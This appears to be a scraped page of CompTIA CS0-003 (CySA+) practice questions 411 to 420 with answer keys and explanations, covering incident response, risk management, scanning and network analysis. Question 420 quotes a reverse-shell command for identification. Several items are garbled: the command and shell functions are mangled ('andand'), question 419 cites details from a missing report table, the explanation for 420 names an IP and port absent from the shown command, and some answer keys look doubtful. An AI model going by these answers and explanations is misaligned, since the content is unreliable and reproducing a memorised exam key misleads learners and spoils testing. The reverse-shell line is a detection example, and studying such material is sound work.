CompTIA CompTIA Certifications CS0-003 Questions & Answers

• Question 411:

  Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

  A. Identify any improvements or changes in the incident response plan or procedures

  B. Determine if an internal mistake was made and who did it so they do not repeat the error

  C. Present all legal evidence collected and turn it over to iaw enforcement

  D. Discuss the financial impact of the incident to determine if security controls are well spent

  Correct Answer: A

  An important aspect that should be included in the lessons-learned step after an incident is to identify any improvements or changes in the incident response plan or procedures. The lessonslearned step is a process that involves reviewing and evaluating the incident response activities and outcomes, as well as identifying and documenting any strengths, weaknesses, gaps, or best practices. Identifying any improvements or changes in the incident response plan or procedures can help enhance the security posture, readiness, or capability of the organization for future incidents

• Question 412:

  Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

  A. Determine the sophistication of the audience that the report is meant for

  B. Include references and sources of information on the first page

  C. Include a table of contents outlining the entire report

  D. Decide on the color scheme that will effectively communicate the metrics

  Correct Answer: A

  The best way to begin preparati"" regarding a recent incident involving a cybersecurity breach is to determine the sophistication of the audience that the report is meant for. The sophistication of the audience refers to their level of technical knowledge, understanding, or interest in cybersecurity topics. Determining the sophistication of the audience can help tailor the report content, language, tone, and format to suit their needs and expectations. For example, a report for executive management may be more concise, high-level, and businessoriented than a report for technical staff or peers.

• Question 413:

  A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

  A. Upload the binary to an air gapped sandbox for analysis

  B. Send the binaries to the antivirus vendor

  C. Execute the binaries on an environment with internet connectivity

  D. Query the file hashes using VirusTotal

  Correct Answer: A

  The best action that would allow the analyst to gather intelligence without disclosing information to the attackers is to upload the binary to an air gapped sandbox for analysis. An air gapped sandbox is an isolated environment that has no connection to any external network or system. Uploading the binary to an air gapped sandbox can prevent any communication or interaction between the binary and the attackers, as well as any potential harm or infection to other systems or networks. An air gapped sandbox can also allow the analyst to safely analyze and observe the behavior, functionality, or characteristics of the binary.

• Question 414:

  Which of the following would help to minimize human engagement and aid in process improvement in security operations?

  A. OSSTMM

  B. SIEM

  C. SOAR

  D. QVVASP

  Correct Answer: C

  SOAR stands for security orchestration, automation, and response, which is a term that describes a set of tools, technologies, or platforms that can help streamline, standardize, and automate security operations and incident response processes and tasks. SOAR can help minimize human engagement and aid in process improvement in security operations by reducing manual work, human errors, response time, or complexity. SOAR can also help enhance collaboration, coordination, efficiency, or effectiveness of security operations and incident response teams.

• Question 415:

  After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

  A. Avoid

  B. Transfer

  C. Accept

  D. Mitigate

  Correct Answer: A

  Avoid is a risk management principle that describes the decision or action of not engaging in an activity or accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or impact of the risk, as well as the need for any further risk management actions. In this case, the CISO decided the risk score would be too high and refused the software request. This indicates that the CISO selected the avoid principle for risk management.

• Question 416:

  A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

  A. Credentialed network scanning

  B. Passive scanning

  C. Agent-based scanning

  D. Dynamic scanning

  Correct Answer: C

• Question 417:

  A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

  A. function x() { info=$(geoiplookup $1) andand echo "$1 | $info" }

  B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') andand echo "$1 | $info" }

  C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1} ').origin.asn.cymru.com TXT +short) andand echo "$1 | $info" }

  D. function x() { info=$(traceroute -m 40 $1 | awk `END{print $1}') andand echo "$1 | $info" }

  Correct Answer: D

• Question 418:

  There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

  A. Implement step-up authentication for administrators

  B. Improve employee training and awareness

  C. Increase password complexity standards

  D. Deploy mobile device management

  Correct Answer: B

  The best security control to implement against sensitive information being disclosed via file sharing services is to improve employee training and awareness. Employee training and awareness can help educate employees on the risks and consequences of using file sharing services for sensitive information, as well as the policies and procedures for handling such information securely and appropriately. Employee training and awareness can also help foster a security culture and encourage employees to report any incidents or violations of information security.

• Question 419:

  An analyst is reviewing a vulnerability report for a server environment with the following entries:

  

  Which of the following systems should be prioritized for patching first?

  A. 10.101.27.98

  B. 54.73.225.17

  C. 54.74.110.26

  D. 54.74.110.228

  Correct Answer: D

  The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017- 0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as possible.

• Question 420:

  A security analyst detects an exploit attempt containing the following command:

  sh -i >and /dev/udp.1.1.11 0>$l

  Which of the following is being attempted?

  A. RCE

  B. Reverse shell

  C. XSS

  D. SQL injection

  Correct Answer: B

  A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the " a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command: sh -i >and /dev/udp.1.1.11 0>$l This command is a shell script that creates a reverse shell connection from the target system to the "P address 10.1.1.1 and port 4821 using UDP protocol.